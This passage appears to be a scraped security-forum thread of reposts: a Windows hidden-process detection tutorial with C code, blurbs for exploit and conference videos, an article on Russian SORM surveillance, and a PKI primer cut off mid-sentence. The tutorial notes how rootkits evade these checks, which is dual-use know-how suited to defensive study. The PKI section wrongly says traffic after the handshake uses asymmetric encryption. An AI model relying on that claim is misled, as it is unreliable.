0x41DC and then check if that process exist by calling OpenProcess function. Then this list of discovered processes are compared with normal process list got using standard enumeration functions (such as Process32First, EnumProcesses functions). During the testing, it is found that some process id on server machines were more than magic number 0x41DC. So in order to be effective the magic number is doubled to take care of all possible running processes on latest operating systems. Here is the sample code that implements PIDB method: for(int i=0; i < 0x83B8; i+=4) { //These are system idle and system processes if( i == 0 || i==4 ) { continue; } hprocess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, i); if( hprocess == NULL ) { if( GetLastError() != ERROR_INVALID_PARAMETER) { // If the error code is other than // ERROR_INVALID_PARAMETER that means this // process exists but we are not able to open. //check if this process is already discovered //using standard API functions. if( IsHiddenProcess(i) ) { printf("\n Hidden process found %d", i); } } continue; } dwExitCode = 0; GetExitCodeProcess(hprocess, &dwExitCode); // check if this is active process... // only active process will return error // code as ERROR_NO_MORE_ITEMS if( dwExitCode == ERROR_NO_MORE_ITEMS ) { //check if this process is already discovered if( IsHiddenProcess(i) ) { printf("\n Hidden process found %d", i); } } CloseHandle(hprocess); } Though this is very effective method, rootkit can easily defeat this technique by hooking OpenProcess or its native version NTOpenProcess function and then returning NULL with error code as ERROR_INVALID_PARAMETER. To defend against such tricks anti-rootkit softwares can call NtOpenProcess using direct system call method as shown in "Detection of Hidden Process using Direct NT System Call Implemenation". HPD with CSRSS Process Handle Enumeration TOP Any windows process when run will have lot of open handles realted to process, thread, named objects, file, port, registry, etc. that can be used to detect hidden process. One can use the native API function. The effective way to enumerate handles is to use NtQuerySystemInformation with first parameter as SystemHandleInformation. It lists the handles from all running processes in the system. For each enumerated handle, it provides information such as handle, handle type and process id of the owning process. Hence, by enumerating through all the handles and then using the associated process id, one can detect all possible hidden processes that are not revealed through standard API functions. There is one interesting system process called CSRSS.EXE, which holds the handles to all running processes. So instead of going through all the different handles, one can just scroll through the process handles of CSRSS.EXE process. Interestingly this method can, not only detect userland hidden processes but also some of the rootkit processes which have used kernel land techniques without taking care of hiding process handles within CSRSS.EXE process. Here is the code snippet, which can demonstrate this method: PVOID bufHandleTable = malloc(dwSize); status = NtQuerySystemInformation (SystemHandleInformation, bufHandleTable, dwSize, 0); SYSTEM_HANDLE_INFORMATION *HandleInfo = (SYSTEM_HANDLE_INFORMATION *) bufHandleTable; // Process handles within CSRSS will not have handle // to following processes system idle process, system // process, smss.exe, csrss.exe. for(int i=0; i< HandleInfo->NumberOfHandles; i++) { int pid = HandleInfo->Handles.UniqueProcessId; // For XP & 2K3 : HANDLE_TYPE_PROCESS = 0x5 // For Vista & Longhorn : HANDLE_TYPE_PROCESS = 0x6 if( HandleInfo->Handles.ObjectTypeIndex == HANDLE_TYPE_PROCESS) { //check if this process id is that of CSRSS.EXE process. if( IsCSRSSProcess(pid) ) { hprocess = OpenProcess(PROCESS_DUP_HANDLE, false, pid); if( hprocess ) { if( DuplicateHandle(hprocess, (HANDLE)HandleInfo->Handles.Handle, GetCurrentProcess(), &tprocess, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, 0)) { targetPid = GetProcessId(tprocess); //check if this is hidden process if( IsHiddenProcess(targetPid) ) { printf("\n Found hidden process %d", targetPid); } } }// End of if( hprocess ) } // End of if( IsCSRSSProcess(pid) ) } // End of if } // End of for-loop Since the CSRSS.EXE is not first process started when Windows boots, it does not contains handles to already started processes such as system idle process(pid=0), system process (pid=4), smss.exe and its process itself. On Windows Vista system it is possible to more than one CSRSS.EXE process in case of multiple users logged in. Same situation arises on XP system, when more than one user is operating through 'Switch User' mechanism. In such case, one has to check if the enumerated process belongs to any of these CSRSS process ids. The function IsCSRSSProcess() above does exactly the same by comparing the discovered process id with list of all running CSRSS.EXE processes. One more way is to enumerate all thread handles within CSRSS process instead of process handles, as most rootkits are aware of this technique. The CSRSS process not only has process handles but also thread handles for every running processes. Once the thread handle is known, one can use GetProcessIdOfThread function to get process id associated with that thread after duplicating it. Though any rootkit process can defeat this technique by hooking NtQuerySystemInformation or NtOpenProcess function, it can easily be circumvented by using direct implementation of these native API functions as described in the "Detection of Hidden Process using Direct NT System Call Implemenation". Other Methods of Detecting Hidden Processes TOP There exists several other userland methods to detect hidden rootkit processes, but they are not as effective as the ones described above. However they can be used on need basis and often to target specific rootkit. One such method is to enumerate through all the open Windows created by the processes within the system using EnumWindows API function and then calling the GetWindowThreadProcessId function to get the process id associated with that Window. Here is the sample code that does the same... //Setup the callback function to enumerate through windows EnumWindows(EnumWindowsProc, NULL); //This is callback function to enumerate windows BOOL CALLBACK EnumWindowsProc(HWND hwnd, PARAM lParam) { DWORD procId; GetWindowThreadProcessId(hwnd, &procId); if( IsHiddenProcess(procId) ) { printf("Found hidden process %d", procId); } } There exist several other ways to detect the hidden processes in user land and new ways are being discovered everyday. Though these detection techniques can be easily defeated from kernel land, they present simple and less risky mechanism to uncover the userland rootkits. References TOP 1. http://rootkit.com/newsread.php?newsid=434 2. CsrWalker - processes detection from User Mode - Sysinternals Forums - Page 1 Sursa: Userland - Hidden Process Detection - RootkitAnalytics.com
  11. Writing Buffer Overflows By Haxor Magee Description: Vulnerable App - Snort <= 1.9.1 - Remote Root Exploit (p7snort191.sh)... (download it at the top) Immunity Debugger- http://debugger.immunityinc.com/regis... perl for windows- ActivePerl is Perl for Windows, Mac, Linux, AIX, HP-UX & Solaris | ActiveState... Use windows xp 32 bit for testing!! Sursa: Writing Buffer Overflows By Haxor Magee
  12. Ccc Camp 11 Black Ops Of Tcp/Ip 2011 Description: Black Ops of TCP/IP 2011 Remember when networks represented interesting targets, when TCP/IP was itself a vector for messiness, when packet crafting was a required skill? In this thoroughly retro talk, we're going to play with systems the old fashioned way, cobbling together various interesting behaviors with the last few shreds of what low level networking has to offer. Here's a few things to expect: * IPv4 and IPv6 Fragmentation Attacks, Eight Years In The Making * TCP Sequence Number Attacks In Modern Stacks * IP TTLs: Not Actually Expired * Inverse Bug Hunting: More Things Found On The Open Net * Rebinding Attacks Against Enterprise Infrastructure * BitCoin: Network Manipulation for Fun And (Literal) Profit * The Net Neutrality Transparency Engine DNS might show up, and applications are going to be poked at. But this will be an old style networking talk, through and through. For More Information please visit : - Camp 2011: Sursa: Ccc Camp 11 Black Ops Of Tcp/Ip 2011
  13. Nick Walker: Android Security Assessments 101 Description: Following a warm welcome to Securi-Tay 2 by Paul Dalton (chair of the organising committee), Nick Walker (@tel0seh) discussed the security implications of Android applications, and demonstrated exploiting an Android device using the Mercury 2.0 framework as Securi-Tay 2's opening and keynote speaker. Securi-Tay 2 took place on 16th January 2013 at the University of Abertay Dundee. For more information, please visit: http://www.Securi-Tay.co.uk Abertay Ethical Hacking Society: Ethicalhackingsociety.com Abstract: Android has firmly established it's place as a contender in the smartphone market in recent years, and the number of applications available for the operating system has increased drastically. Our phones live in our pockets and contain vast amounts of information about ourselves, as we rely on them for everything from communication, to purchases and banking. The security of these applications is obviously imperative, yet the technology and the security of such is widely misunderstood. This talk will explore the security implications of developing android applications, and a walkthrough of a methodology used by security consultants to identify vulnerabilities. (featuring Mercury 2.0) For More Information please visit :- Mailing List Signup - Securi-Tay Information Security Conference https://www.youtube.com/channel/UC8Z30xDABAC_KgVFR9Nt75A?&channel=AbertayHackers Sursa: Nick Walker: Android Security Assessments 101
  14. Ccc Camp 11 Ios Application Security Description: iOS application security A look at the security of 3rd party iOS applications Over the last few years there has been a signifant amount of iPhone and iPad application development going on. Although based on Mac OSX, its development APIs are new and very specific to the iPhone and iPad. In this presentation, Ilja van Sprundel, Principal Security Consultant at IOActive, will discuss lessons learned from auditing iPhone and iPad applications over the last year. It will cover the use of specific APIs, why some of them aren't granular enough, and why they might expose way too much attack surface. The talk will cover ssl, xml, url handling, UIWebViews and more. Furthermore, it will also cover what apps are allowed to do when inside their sandbox once an application has been hacked. For More Information please visit : - Camp 2011: Sursa: Ccc Camp 11 Ios Application Security
  15. Russia and Internet Freedom The Russian government is increasing its pressure on social media. Many experts maintain that the population is suffering a serious online censorship. The analysts have noted a surge in the use of anonymous web surfing software like Tor. According to data proposed on the Tor Metrics Portal, the number of directly connecting users from Russia passed from 80,000 in June to more than 200,000 in the last week. It has been estimated that Russian Internet users were 68 million last winter (59% of the adult population), and despite the fact that 200,000 users represent a small fraction of the overall Russian online population, the data show a concerning situation in which Russian netizens are afraid of the monitoring of online activities by the government. In May, the State Duma discussed a copyright protection bill, still pending, that proposes extrajudicial blacklisting of websites suspected of hosting pirated content. Experts and Internet freedom activists are accusing the Russian government of working to introduce online censorship in the country. “They are enemies of freedom of information … But all they will achieve is an increase in the public’s computer literacy,” said Anton Nosik, a popular Russian blogger. The censorship in Russia could affect the most popular social media sites, impacting millions of Internet users. It’s clear that the Kremlin fears the possibility that foreign governments could destabilize the countries, or some local areas, with PSYOPs. Figure – Tor Metrics – Direct users by Russia Below is the timeline of Internet regulation activities in Russia proposed by the Moscow Time: • 2012, November: Extrajudicial blacklisting allowed for websites promoting child pornography, suicide and illegal drugs. Data from Rublacklist.net indicates 97 percent of websites on the list committed no offense and were banned as the collateral damage of imperfect blacklisting methods. • 2013, July: Extrajudicial blacklisting expanded to websites accused of hosting possibly pirated films. The number of Russian Tor users in the period between mid-August and mid-September 2013 rose from 25,000 to 150,000. Figure – Tor Metrics Direct user by country (last 12 months) • 2013, October: The Pirate Party of Russia, which campaigns for freedom of information, is denied official registration for the third time over its title, which, the government claimed, promotes “robbery on the high seas.” • 2014, February: Extrajudicial blacklisting expanded to websites accused of promoting riots as well as extremism, a charge frequently applied to critics of the government. • 2014, June: Bloggers with a daily readership upward of 3,000 users are obliged by law to de-anonymize and register with the state. On January 15th 2013, Vladimir Putin approved a decree that assigns full powers to the Federal Security Service (FSB) to “create a state system for the detection, prevention and liquidation of the effects of computer attacks on the information resources of the Russian Federation.” Neither the FSB nor the Kremlin have provided further details on the government program to reinforce the security of cyber space. Russian authorities are working on the definition of an automated defense system able to mitigate incoming cyber attacks against Russian web assets inside the country and also abroad. In November 2012, the Russian government deployed a system that is able to monitor Internet activities of millions of citizens and ban content not approved by the central government. The project will use new complex Internet-monitoring technologies to implement the “Single Register” that is able to spy on the Internet activities of Russians, officially to prevent online pedophilia. The Register is populated with requests of censorship coming from the Agency for the Supervision of Information Technology, Communications and Mass Media (The Roskomnadzor) that applies court decisions and executes orders of three government agencies: the Interior Ministry, the Federal Antidrug Agency, and the Federal Service for the Supervision of Consumer Rights and Public Welfare. In July 2013, Vladimir Putin signed a law that contemplates also the possibility to put under judgment non only child pornography, but also online contents that express dissent against the government. The agency has established a complete control of Internet activities, exactly like many other countries, and it has in fact the power to impose to the ISP to block the indicted contents within 24 hours, according to news proposed by the media. But how does the Register operate? According to the article published on Wired, the government of Moscow has deployed a system which implements a DPI (deep packet inspection) technology on a nationwide scale, despite there being no official mention in the signed law. DPI is the most advanced and intrusive category of inspection tools, as it is able to analyze every single packet of the traffic, filtering for particular services or contents. Many other governments in the world have adopted it, including Iran and China, which adopted the technology to implement its Great Firewall project. The following is a passage of the declaration of the Ministry of Communications of the presence of the Deep Packet Inspection technology. “At the end of August, under the chairmanship of Communications minister Nikolai Nikiforov, a working group was held, drawing representatives of Google, SUP Media (the owner of the Livejournal social network), and of all the other big hitters. They discussed how to ensure that the [filtering] mechanism — they used the concrete example of YouTube — how to block a specific video, without blocking YouTube as a whole. And they reached the conclusion that pleased them all,” Ilya Ponomarev, a member of the State Duma and an ardent supporter of the law, declared. Are we are talking about DPI technology? we asked. “Yes, precisely.” Eric King, head of research at Privacy International, declared: “No Western democracy has yet implemented a dragnet black-box DPI surveillance system due to the crushing effect it would have on free speech and privacy,” “DPI allows the state to peer into everyone’s internet traffic and read, copy or even modify emails and web pages: We now know that such techniques were deployed in pre-revolutionary Tunisia. It can also compromise critical circumvention tools, tools that help citizens evade authoritarian internet controls in countries like Iran and China.” The system is codenamed as SORM (“System for Operative Investigative Activities”). It could be used for Internet surveillance, as according to a Russian law passed in 1995, the FSB (state security organization) can monitor telephone and Internet communications. SORM-1 system was established in 1996 to monitor telephone communications substituted by SORM-2 in July 1998 to monitor the Internet. Internet Service Providers (ISPs) must install a special device on their servers to allow the FSB to track all credit card transactions, e-mail messages and web use. The cost of SORM equipment at the time the regulation was introduced was nearly USD 25,000, a price considered very expensive by many small and independent ISPs that decided to shut down. There was also a singular case of a small regional ISP in Volgograd, Bayard-Slaviya Communications, which tried to refuse the installation of the appliance according to the new law. As expected, the Ministry of Communications revoked the provider’s license, however, when the ISP brought the question to the court, the ministry renewed its license. An event such as the Arab Spring and the parallel growth of political activism has alerted the Russian government to the dangers of free circulation of information on social media. The imperative is monitoring everything to avoid surprises, to keep Western eyes far from “internal questions”. First Deputy Director of the FSB Sergei Smirnov declared: “New technologies are used by Western secret services to create and maintain a level of continual tension in society with serious intentions extending even to regime change…. Our elections, especially the presidential election and the situation in the preceding period, revealed the potential of the blogosphere.” Smirnov stated that it was essential to develop ways of reacting adequately to the use of such technologies and confessed openly that “this has not yet happened.” There is a contradiction in the Russian approach that for years has declared to be contrary to so invasive Internet control, raising critical concerns on Chinese Internet censorship. According to the declaration of Russian intelligence, DPI technologies have been introduced a long time ago. In 2004, the security department acquired a Transtelecom system for its internal network. Many companies sell DPI technology in Russia, such as the Canadian Sandvine, the Israeli Allot, Americans Cisco and Procera, and Chinase Huawei. Since 2013, all mobile operators in Russia have deployed a DPI: Procera was installed in VimpelCom. Huawei’s DPI solutions are in use in Megafon. MTS bought CISCO DPI technology. The mobile operators motivated the acquisitions of DPI to control the use of bandwidth saturated by improper adoption of peer to peer protocols. The introduction of DPI in this case allows to suppress any undesired services, such as torrents. Also Russian ISPs have installed DPI appliances as required by law at their own expense. Minor operators have also searched for cheap solutions found in the used market of CISCO DPIs. The situation is really worrying in my opinion. The Russian government has been demonstrated to have zero tolerance against any kind of opposition. In Russia, to express any idea against Putin’s government is really dangerous. The Russian government is evaluating the possibility to regulate popular media like Facebook and Twitter in the country, and something quite similar for news aggregators including Google and Yandex. If you interested in further data on Internet control operated by Russia, give a look to the information collected by the OpenNet Project, an initiative that collects data on worldwide Internet filtering. The organization confirms that Russia is implementing selective filtering, mainly for political and social issues. Figure – OpenNet Project – Data on Russian Internet Monitoring System of Operative-Investigative Measures (SORM) The System of Operative-Investigative Measures, also known as SORM, is the Russian system of lawful interception of all electronic communication. The system has been mentioned in numerous documents. In early 2013, the Bureau of Diplomatic Security at the U.S. State Department issued an official alert for US citizens wanting to assist in the Winter Olympics in Sochi, Russia. Figure – Russian Lawful Interception The U.S. warning ends with a list of “Travel Cyber Security Best Practices,” which, apart from the new technology, resembles the briefing instructions for a Cold War-era spy: “Consider traveling with “clean” electronic devices—if you do not need the device, do not take it. Otherwise, essential devices should have all personal identifying information and sensitive files removed or ‘sanitized.’ Devices with wireless connection capabilities should have the Wi-Fi turned off at all times. Do not check business or personal electronic devices with your luggage at the airport. … Do not connect to local ISPs at cafes, coffee shops, hotels, airports, or other local venues. … Change all your passwords before and after your trip. … Be sure to remove the battery from your Smartphone when not in use. Technology is commercially available that can geo-track your location and activate the microphone on your phone. Assume any electronic device you take can be exploited. … If you must utilize a phone during travel consider using a ‘burn phone’ that uses a SIM card purchased locally with cash. Sanitize sensitive conversations as necessary,” states the US warning. The warning is clear and could give the reader an idea of the powerful capabilities of Russian Intelligence. US authorities invite Americans returning from Sochi to destroy their mobile devices. Principal Telecommunication operators and Internet Service Providers are required by law to intercept persons of interest to provide collected data to the respective government agencies. The Federal Security Service (FSB) and any other law enforcement or intelligence agencies in the country have to receive a court order before intercepting Russian citizens, but, as reported by the World Policy Institute, Telecom providers have no right to demand that the intelligence agency show them the warrant. It is curious to note that the FSB requested to the operators and ISPs to physically install the needed SORM hardware, taking on the cost of installation and maintenance, but not having the rights to access the information they have acquired. SORM appliances are distributed in all the country and are connected via a protected underground network to the local FSB headquarters. The SORM program is an ongoing project started by the Soviet KGB in the mid-1980s. Many technological evolutions have produced continuous updates in the lawful interception system. The Russian government has introduced the surveillance system to improve the investigative activities of crimes and the prevention of terrorism. The Law on Systems for Operational Investigation Activity (SORM) of 1995 authorized the FSB monitoring of any telecommunication transmission. In 1999 an amendment to SORM, SORM-II, extended its efficiency on Internet traffic. SORM-II is still operating, and since 2008, thanks to an order signed by the Minister of Communications Leonid Reiman, it could be also used to monitor users’ Internet activities. SORM-II obliges ISPs to provide the FSB with statistics on all Internet traffic that passes through their servers. This is possible with the installation of SORM appliances on their servers to route all transmissions in real time through the FSB monitoring platforms. In this way, the FSB is able to track every users’ transactions, e-mail communications, and online browsing. In many sources on the web, it is referenced that SORM-3 is able to collect information from all forms of communications and analyze the huge amount of data collected. The worrying aspect of the story is that according to Russia’s Supreme Court, the number of intercepted telephone conversations and email messages has doubled in six years. “Providers must also provide the FSB with information on users’ names, telephone numbers, e-mail addresses, one or more IP addresses, key words, user identification numbers, and users’ ICQ number (instant messaging client), among others. Under Putin, Minister of Communications Reiman entered an order stating that the FSB officials shall not provide information to the ISPs either on users who are being investigated or regarding the decision on the grounds of which such investigations are made. Consequently, this Order offered a ‘carte blanche’ to the Special Services to police the activities of Internet users without supplying any further information to the provider or any other interested party,” states the report from the OpenNet initiative. Social media as a potential threat Fearing uprisings like the Arab Spring, the Russian FSB has increased the monitoring of social media platforms. Russian intelligence is aware of the potential effect of PSYOPs. The revolutions in the Middle East and the role played by social networks were the main topics of discussion at an informal summit of the Collective Security Treaty Organization (CSTO), a regional military alliance led by Moscow in August 2011. In December 2011, wind of protest was blowing on Moscow, prompted by Putin’s campaign to return to the presidency, and social networks assumed a critical role in the diffusion of information discrediting Putin and its collaborators. The FSB ordered suppression of the media activity of protest groups, for example, it ordered Pavel Durov, founder of the Russian social network VKontakte, to block websites of protest groups, but the man refused. The failure in preventing protest originated on social media led the government to adopt a new platform to monitor social networks and identify participants in online discussions. But SORM isn’t the only system available for monitoring activities. The Commonwealth of Independent States (CIS) uses a special analytical search system designed by the Russian firm Analytic Business Solutions called “Semantic Archive”. Semantic Archive key features are: Automated collecting and processing of information obtained from heterogeneous sources, both internal (file documents, proprietary databases, e-mails) and external (online databases, news media, blogs, forums, social networks). Single uniform storage for all types of collecting documents. Knowledge extraction, i.e. automatic and semi-automatic extraction of objects, events and relationships from documents. Maintaining of knowledge base and collecting dossiers on particular projects, investigations, partners, competitors, clients, etc. Revealing of hidden or implicit relationships between objects. Visual presentation of knowledge in the form of semantic network. Variety of reports used to present results of research. According to the description provided, the Semantic Archive allows the monitoring of any media archives, online sources, blogs, and social networks. It allows the composition of complex queries providing also a visual representation of the results obtained. Of course, the FSB decided that it was necessary data extracted by social media servers with similar systems, but to do this it has obliged the companies providing the web services to allow access to their data to SORM. The operation was successful with Russian social networks Vkontakte and Odnoklassniki whose systems are hosted in Russia, but Qestern social networks including Twitter and Facebook excluded this possibility. The Kremlin is attempting to force international social media companies operating on Russian soil to cooperate with the central government in compliance with the national law framework. In November 2012, the Russian government acquired a system for Internet filtering within the country. It was introduced the Single Register which collects the request for black list of websites by three government agencies: the Roskomnadzor, the Federal Anti-Drug Agency, and the Federal Service for the Supervision of Consumer Rights and Public Welfare. Each request must be served within 24 hours, and hundreds of websites have been already banned from the Russian Internet. The control applied by Russian authorities is capillary. Every access point to the Internet is controlled; Internet cafes, libraries and any public place are subject to continuous inspection. During the December’s International Telecommunications Union (ITU) conference in Dubai, the Russian government proposed its design for a system for Internet monitoring. The project proposed by Russia aims to manage distribution of domain names/IP addresses from the US-based organization ICANN to an international organization such as the ITU, which could be easily influenced by Moscow. The Russian proposal was not approved. The United States, United Kingdom, Western Europe countries, Australia and Canada didn’t vote for it. The majority of Russian Internet users are connected by broadband (40 percent), followed by dial-up (27 percent), and ADSL (23 percent), according to data provided by the OpenNet Initiative. Nearly 89 percent of the Russian telecommunications infrastructure now belongs to SvyazInvest, which is controlled by the Russian government through the Federal Property Agency. Looking to regional ISPs, it is possible to note that the principal ones (e.g. Central Telecommunication Company, North-West Tele-com, VolgaTelecom, Southern Telecom, Uralsvyazinform, Sibirtelecom, Dalsvyaz, and Central Telegraph) are SvyazInvest’s subsidiaries. Also the popular Rostelecom telecommunications operator and ISP are controlled by SvyazInvest for 51 percent of total shares. The experts at Recorded Future have analyzed the SORM manufacturers with their platform and they identified several equipment suppliers from different countries, including Cisco Systems (US), Juniper Networks (US), Huawei (China) and Alcatel-Lucent (France). Further evidence of the extension of the SORM system was observed in the wake of the Crimea’s occupation by Russian supporter groups and claimed cyber attacks on the Ukrainian telecommunications systems. The control over Ukrainian telecommunication systems was also possible thanks to the control of SORM equipment installed by the Ukrainian government for lawful interception activities. Figure – RecordedFuture Analysis Russian Timeline Figure – RecordedFuture SORM Timeline Several former Soviet States, including Belarus, Kazakhstan, Uzbekistan and Ukraine have installed SORM devices. In particular, the system installed in Ukraine is considered the most advanced because it also implements a kill switch system for the target’s communication channels. In April 2011, the company Iskratel announced its SORM architecture was tested successfully under the new requirements and had been approved by the SBU. Sochi Olympic Games Just a few weeks before the Sochi Olympics, NBC News revealed that attendees at the event were being hacked just before arriving in Sochi. Intelligence agencies of all participating governments were worried about the possibility of a terrorist attack or a cyber attack against the organization and its assets. The event represented a great occasion for bad actors which could benefit from the media attention to run clamorous cyber attacks. The reporter Richard Engel demonstrated the efficiency of the Russian surveillance system with the support of a cyber security expert. They configured two computers to verify how quickly the device would be attacked when accessing Russian networks. The discovery was predictable: when the reporter and his collaborator went to a cafe to access the network, they were immediately attacked. “Before we even finished our coffee” the bad actors had hit, downloading malware and “stealing my information and giving hackers the option to tap or even record my phone calls … less than 1 minute [for hackers] to pounce, and in less than 24 hours, they had broken into both of my computers,” Engel said. As the journalist explained, it was enough to go online to be a victim of the attack. The Kaspersky Lab, which was in charge to support the Sochi Olympic Committee for providing computer security, confirmed that every entity is subject to attack. The Russian authorities, through the control of the communication channels, are able to inoculate any kind of malicious code which could be used to track individuals that accessed public and mobile telecommunications. Every single bit transmitted via phone and Internet is analyzed by the Russian System for Operational-Investigative Activities, according to the U.S. State Department’s Overseas Security Advisory. “OSAC constituents traveling to Sochi should be aware that the Russian System for Operational–Investigative Activities (SORM) lawfully enables authorities to monitor, record, analyze, and retain all data that traverses Russian networks. Through SORM technologies, Russian authorities have access to any information transmitted via telephone and Internet networks, including all emails, telephone calls, Internet browsing sessions, text messages, and fax transmissions. By Russian law, all telecommunications companies and Internet Service Providers (ISPs) are required to install SORM devices on their networks. These devices allow for remote access and transmission of information to the Russian Federal Security Service (FSB) offices. Telecommunications providers are denied access to the surveillance devices and, therefore, have no knowledge of any accessed or intercepted communications. “Although the FSB technically requires a court order to intercept communications, there is no requirement to show it to anyone outside the agency. SORM is enabled throughout Russia and is undergoing technological upgrades and modernization. Since 2010, particular attention has been paid to Sochi in preparation for the Olympics. The system in Sochi is capable of capturing telephone (including mobile phone) communications; intercepting Internet (including wireless/Wi-Fi) traffic; and collecting and storing all user information and data (including actual recordings and locations). Deep packet inspection will allow Russian authorities to track users by filtering data for the use of particular words or phrases mentioned in emails, web chats, and on social media.” The Sochi Olympic Games have provided evidence of the complex monitoring machine managed by the Russian Intelligence. The reports issued by other intelligence agencies and the information provided by independent journalists lead to speculation of a powerful structure, comparable to the US one, used for Internet monitoring. Don’t forget that the Russian government is also considered one of most dangerous entities in cyber space due to its cyber capabilities. Many experts have attributed to the Russians cyber espionage campaigns like the SNAKE, which allowed a large-scale espionage operation. Figure – Sochi infrastructure Conclusions The Russian SORM surveillance systems is a worrying reality, and analyzing the data proposed, there are some reflections that raise serious questions about its final use: Technology used by the Russian government is very advanced. It is a mix of best surveillance devices provided by principal suppliers of foreign countries. From a legal perspective, SORM is far more flexible and intrusive than the Western surveillance systems. It is enough to add an entry for a subject of interest in the Register to allow monitoring of individuals without a time limit. SORM is deployed in many other former Soviet countries. This could advantage Russian Intelligence in the extension of their lawful interception activities. SORM, like any other surveillance system, is considered by governments a necessary instrument to ensure homeland security, but we cannot ignore their abuse, a circumstance that is also very frequent in countries like Russia. I decided to write about SORM because of the numerous questions I receive daily, but it is important to remark that many other countries have deployed similar systems and operate a more aggressive policy against any form of dissent. Unfortunately, in many countries, it is not possible to express an opinion if contrary to the central government. Millions of people every day risk their life for a blog post or for participation in a discussion on social media. References Russia deploys a massive surveillance network system - Security Affairs | Security Affairs Russian government wants to strengthen its cyber defense,what's new? - Security Affairs | Security Affairs Anonymous Browser Mass Hit as Russians Seek to Escape Internet Censorship | News | The Moscow Times ITAR-TASS: Economy - Russia wants to replace US computer chips with local processors Sochi visitors Hacked in few minutes to prevent attacks | Security Affairs Russia to Monitor All Communications at Sochi Winter Olympics; SORM System is “PRISM on Steroids” | LeakSource https://www.recordedfuture.com/russia-ukraine-cyber-front/ http://www.europarl.europa.eu/meetdocs/2009_2014/documents/libe/dv/soldatov_presentation_/soldatov_presentation_en.pdf Lawful Interception and SORM | Iskratel In Ex-Soviet States, Russian Spy Tech Still Watches You | Danger Room | WIRED https://www.us-cert.gov/ncas/tips/ST14-001 Russia Moves Toward China-Style Internet Censorship - Businessweek Russia's Surveillance State | World Policy Institute Analytical Business Solutions, Inc. - Semantic Archive PRISM and SORM: Big Brother is watching | RUSSIA | The Moscow News https://www.privacyinternational.org/reports/russia/ii-surveillance-policy By Pierluigi Paganini|July 1st, 2014 Sursa: How Russia Controls the Internet - InfoSec Institute
  16. [h=2]Public Key Infrastructure (PKI) in the Cloud[/h] As the adoption of various forms of cloud models (i.e. public, private, and hybrid) in various industry verticals are increasing, the cloud buzzword is on a new high. However, customers still have doubts about the security areas and raise a common question: “How can I trust the cloud?” The simplest answer to this question will be to “build trust around the cloud,” but how? Well, we have a wonderful concept of Public Key Infrastructure (PKI), which if planned and implemented properly, can be a good fit for the answer to build customers’ trust in a cloud. Before discussing in detail the implementation and challenges of PKI in cloud, let’s learn or refresh some basics. Each and every security process, layer or software must implement and cover the CIA triad. What is CIA? C-Confidentiality: It refers to the process to ensure that information sent between two parties is confidential between them only and not viewed by anyone else. I-Integrity: It refers to the process to ensure that the message which is in transit must maintain its integrity i.e., the content of the message must not be changed. A-Availability: The systems available for fulfilling requests must be available all the time. Along with these, some important parameters are described below: Authentication: the process of confirming someone’s identity with the supplied parameters like username and password. Authorization: the process of granting access to a resource to the confirmed identity based on their permissions. Non-Repudiation: a process to make sure that only the intended endpoint has sent the message and later cannot deny it. [h=2]Public Key Infrastructure (PKI)[/h] To provide security services like confidentiality, authentication, integrity, non-repudiation, etc., PKI is used. PKI is a framework which consists of security policies, communication protocols, procedures, etc. to enable secure and trusted communication between different entities within as well as outside the organization. PKI is built as a hybrid mode of the symmetric and asymmetric encryption. Let’s discuss this in brief: Symmetric Encryption: A single key is used to encrypt and decrypt the message sent between two parties. Symmetric encryption is fast, and this type of encryption is effective only when the key is kept absolutely secret and secure between two parties. But to transmit this secret key over an un-trusted network i.e., Internet, comes asymmetric encryption. Asymmetric Encryption: A pair of keys is used to encrypt and decrypt the message. The pair of keys is termed as public and private keys. Private keys are kept secret by the owner, and the public key is visible to everyone. Here is how it works: Suppose ‘A’ and ‘B’ want to communicate using asymmetric encryption. So ‘A’ encrypts the message with ‘B’ public key so that only ‘B’ can decrypt the message with its private key. After decrypting the message, ‘B’ will encrypt the message with ‘A’ public key so that only ‘A’ can decrypt it using its own private key. Sounds like a perfect solution, doesn’t it? Well as far as secrecy is concerned it is, but when it comes to real world scenarios, asymmetric encryption is pretty slow as the keys involved in this process are of 1024, 2048 bits ,etc. and after the initial handshake, for subsequent requests this overhead still needs to be incurred. So what to do? In comes the PKI approach, which is a hybrid approach of symmetric and asymmetric encryption. In this, the handshake process happens with asymmetric encryption to exchange the secret key used for symmetric encryption. Once the secret key is exchanged, the rest of the communication happens over asymmetric encryption. In this way, security and performance are both achieved. PKI is a hierarchal model which is comprised of the below components: Certificate Authority (CA): This entity issues certificates for requests received. This can be in-house or trusted third parties CA like ‘Verisign’, ‘COMODO’, ‘Thwate’ etc. Registration Authority (RA): This entity performs the background checking process on the requests received from end point entities like their business operations in order to avoid issuing any certificate to a bogus entity. Certificate Revocation List (CRL): This is the list issued that contains a list of the certificates which are no longer valid to be trusted. End-point Entities: These entities make requests for the certificates in order to prove their identity and gain trust over the Internet. Certificates Repository: This is the repository which contains a list of issued certificates which the end point entities can retrieve in order to verify the corresponding server. For end users, this repository is usually located in the browser, such as Firefox, IE, Chrome, etc. As it can be noted, the maintenance of these keys is of utmost importance and losing control over these keys will leave the encryption on data useless. Key management is an important process and the most challenging process, as any deviation in this could lead to data loss. The key management life cycle involves the following steps: Creation The first step in the key management life cycle is to create a key pair and apply access control around it. While creating the key, certain important factors need to be considered like key length, lifetime, encryption algorithm, etc. The new key thus created is usually a symmetric key and it is encrypted with a public key of the public-private key pair. Backup Before distributing keys, first of all the backup of keys should be made to some external media. As normally the key created is a symmetric key a.k.a shared key which should be encrypted with a public key from the key pair, then it becomes important to protect the other part of key pair i.e. the private key. Also the policies around the backup media and vaults should be up to the same effect as is designed for any critical business operation to recover from any type of disruption. Deployment After the key is created and backed up, then it is ready to be deployed in the encryption environment. It is advisable to not directly put these keys into action on the production environment. The key operations should be analyzed, and if successful the key should be used for encrypted production data. Monitoring Monitoring of the crypto systems is very important to check for unauthorized administrative access and key operations such as: creation, backing, restoring, archival and destruction. Rotation Keys should be rotated on a regular basis with the keys that are either meant to be expired or need to be changed following a business change. It is important to realize that keys should not be put into system. Expiration As per the best practices dictated in compliances like PCI-DSS, it is important that even valid keys need to be changed after a span of time, not only after the keys are expired. Before the expiration phase, key rotation phase should take place by replacing the associated data with new keys. Archival Before the destruction of keys, archival of expired and decommissioned keys is important if there is still related data in the environment that needs to be recovered like data for recovery operations. This phase is very important from the business decision perspective, and there are some appliances which never go for the destruction phase that causes a risk to be attached. Archived copy of the keys should be properly secured. Destruction After the business use of 